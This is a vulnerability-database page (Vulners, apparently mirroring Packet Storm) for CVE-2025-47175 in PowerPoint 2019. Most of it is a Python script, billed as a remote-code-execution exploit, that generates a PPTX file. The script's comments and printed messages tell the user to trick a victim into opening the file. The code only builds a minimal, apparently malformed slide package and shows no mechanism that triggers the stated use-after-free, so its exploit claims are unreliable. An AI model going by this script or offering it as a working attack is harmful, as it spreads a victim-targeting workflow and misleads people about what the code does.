Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Microsoft PowerPoint 2019 Remote Code Execution

🗓️ 09 Jul 2025 00:00:00Reported by Mohammed Idrees BanyamerType 
packetstorm
 packetstorm🔗 packetstorm.news👁 88 Views

PowerPoint 2019 remote code execution PoC for CVE-2025-47175 via crafted PPTX file.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Use After Free in Microsoft
2 Jul 202512:17
githubexploit
Circl		CVE-2025-47175
10 Jun 202515:24
circl
CNNVD		Microsoft Office PowerPoint 资源管理错误漏洞
10 Jun 202500:00
cnnvd
CNVD		Microsoft PowerPoint Code Execution Vulnerability (CNVD-2025-16692)
13 Jun 202500:00
cnvd
CVE		CVE-2025-47175
10 Jun 202517:02
cve
Cvelist		CVE-2025-47175 Microsoft PowerPoint Remote Code Execution Vulnerability
10 Jun 202517:02
cvelist
Exploit DB		Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
8 Jul 202500:00
exploitdb
EUVD		EUVD-2025-17724
3 Oct 202520:07
euvd
Microsoft KB		Description of the security update for PowerPoint 2016: June 10, 2025 (KB5002689)
10 Jun 202507:00
mskb
Kaspersky		KLA84759 Multiple vulnerabilities in Microsoft Office
10 Jun 202500:00
kaspersky
Rows per page
#!/usr/bin/env python3
    # Exploit Title: Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
    # Author: Mohammed Idrees Banyamer
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-07-02
    # Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
    # CVE: CVE-2025-47175
    # Type: Use-After-Free (UAF) Remote Code Execution (local user required)
    # Platform: Windows (PowerPoint)
    # Author Country: Jordan
    # Attack Vector: Local (User must open crafted PPTX file)
    # Description:
    # This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
    # allowing an attacker to execute arbitrary code by tricking a user into opening
    # a specially crafted PPTX file. This PoC generates such a malicious PPTX file
    # designed to trigger the UAF condition.
    #
    # Steps of exploitation:
    # 1. Run this script to generate the malicious PPTX file.
    # 2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
    # 3. Exploit triggers upon opening the file, leading to possible code execution.
    #
    # Note: This PoC creates a simplified PPTX file structure with crafted XML designed
    # to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
    # are required (not included here).
    #
    # Affected Versions:
    # Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
    #
    # Usage:
    # python3 exploit_cve2025_47175.py [options]
    #
    # Options:
    #   -o, --output   Output PPTX filename (default: exploit_cve_2025_47175.pptx)
    #   -i, --id       Shape ID (default: 1234)
    #   -n, --name     Shape Name (default: MaliciousShape)
    #   -t, --text     Trigger text inside the slide (default: explanation message)
    #
    # Example:
    # python3 exploit_cve2025_47175.py -o evil.pptx -i 5678 -n "BadShape" -t "Triggering CVE-2025-47175 now!"
    import zipfile
    import sys
    import argparse
    
    def create_exploit_pptx(filename, shape_id, shape_name, trigger_text):
        slide_xml = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
           xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
      <p:cSld>
        <p:spTree>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="{shape_id}" name="{shape_name}"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr/>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:t>{trigger_text}</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:spTree>
      </p:cSld>
    </p:sld>'''
    
        try:
            with zipfile.ZipFile(filename, 'w') as z:
                z.writestr('[Content_Types].xml',
                    '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
      <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
      <Default Extension="xml" ContentType="application/xml"/>
      <Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
    </Types>''')
    
                z.writestr('ppt/_rels/presentation.xml.rels',
                    '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/>
    </Relationships>''')
    
                z.writestr('ppt/presentation.xml',
                    '''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
                    xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
      <p:sldIdLst>
        <p:sldId id="256" r:id="rId1"/>
      </p:sldIdLst>
      <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
    </p:presentation>''')
    
                z.writestr('ppt/slides/slide1.xml', slide_xml)
    
            print(f"[+] Malicious PPTX file '{filename}' created successfully.")
            print("[*] Deliver this file to the victim and wait for them to open it in vulnerable PowerPoint.")
        except Exception as e:
            print(f"[-] Error: {e}", file=sys.stderr)
            sys.exit(1)
    
    def main():
        parser = argparse.ArgumentParser(description='Exploit generator for CVE-2025-47175 (PowerPoint UAF)')
        parser.add_argument('-o', '--output', type=str, default='exploit_cve_2025_47175.pptx',
                            help='Output PPTX filename (default: exploit_cve_2025_47175.pptx)')
        parser.add_argument('-i', '--id', type=int, default=1234,
                            help='Shape ID (default: 1234)')
        parser.add_argument('-n', '--name', type=str, default='MaliciousShape',
                            help='Shape Name (default: MaliciousShape)')
        parser.add_argument('-t', '--text', type=str, default='This content triggers CVE-2025-47175 UAF vulnerability.',
                            help='Trigger text inside the slide (default: explanation message)')
        args = parser.parse_args()
    
        create_exploit_pptx(args.output, args.id, args.name, args.text)
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Jul 2025 00:00Current
8High risk
Vulners AI Score8
CVSS 3.17.8
EPSS0.00985
SSVC
PowerPoint 2019use after freeremote code executioncve 2025 47175crafted pptx filelocal user attack
88